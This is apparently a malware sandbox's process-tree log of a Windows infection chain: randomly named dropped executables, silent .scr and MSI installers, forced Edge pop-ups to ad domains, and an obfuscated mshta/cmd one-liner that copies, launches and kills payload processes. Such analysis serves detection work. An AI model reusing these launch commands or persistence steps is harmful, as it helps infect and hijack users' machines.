C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe"C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:956
-
-
C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe"C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4244
-
-
C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe"C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe"6⤵PID:4048
-
C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe"C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe"7⤵PID:5268
-
C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe"C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe"8⤵PID:5464
-
-
C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe"C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe"8⤵PID:5444
-
-
C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"8⤵PID:5740
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )9⤵PID:3992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ) do taskkill -iM "%~NXI" -f10⤵PID:5644
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "gM_Dq9RAigQVrO65QyAT_YbN.exe" -f11⤵
- Kills process with taskkill
PID:7696
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe"C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe"8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4048 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 2769⤵
- Program crash
PID:6308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe"C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe" /mixtwo8⤵PID:6676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe"C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe"8⤵PID:6748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 17409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7532
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe"C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe"8⤵PID:2424
-
C:\Users\Admin\AppData\Roaming\6440459.scr"C:\Users\Admin\AppData\Roaming\6440459.scr" /S9⤵PID:8188
-
-
C:\Users\Admin\AppData\Roaming\7235880.scr"C:\Users\Admin\AppData\Roaming\7235880.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6168
-
-
C:\Users\Admin\AppData\Roaming\5108028.scr"C:\Users\Admin\AppData\Roaming\5108028.scr" /S9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2036
-
-
C:\Users\Admin\AppData\Roaming\1487741.scr"C:\Users\Admin\AppData\Roaming\1487741.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
PID:8124
-
-
C:\Users\Admin\AppData\Roaming\3887265.scr"C:\Users\Admin\AppData\Roaming\3887265.scr" /S9⤵PID:3776
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe"C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4900
-
-
C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"8⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp"C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp" /SL5="$103C4,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"9⤵
- Loads dropped DLL
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:7656 -
C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe"C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1212
-
-
C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe"C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe"11⤵
- Modifies system certificate store
PID:6748 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6308 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:6956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:213⤵PID:8664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:313⤵PID:8692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:813⤵PID:8732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:113⤵PID:8936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:113⤵PID:9028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:113⤵PID:9492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:113⤵PID:9792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:113⤵PID:9804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:813⤵PID:10344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:813⤵PID:10412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:113⤵PID:12284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:113⤵PID:12776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5472 /prefetch:213⤵PID:13600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:113⤵PID:880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5324 /prefetch:813⤵PID:10348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:113⤵PID:8336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:113⤵PID:10192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:813⤵PID:17760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:113⤵PID:21404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:113⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3268 /prefetch:813⤵PID:9576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:113⤵PID:26756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:113⤵PID:31688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:813⤵PID:33836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:113⤵PID:36072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:113⤵PID:36216
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵PID:17040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:17084
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵PID:17080
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:10008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵PID:21312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:21336
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵PID:26672
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:26692
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵PID:31596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:31616
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵PID:35976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵PID:36000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe"C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe"11⤵PID:2792
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit12⤵PID:14328
-
C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:17176 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"14⤵PID:8656
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive & exit12⤵PID:16968
-
C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive13⤵PID:17256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17256 -s 20414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3220
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:17076
-
C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exeC:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654"13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:17296 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵PID:9432
-
-
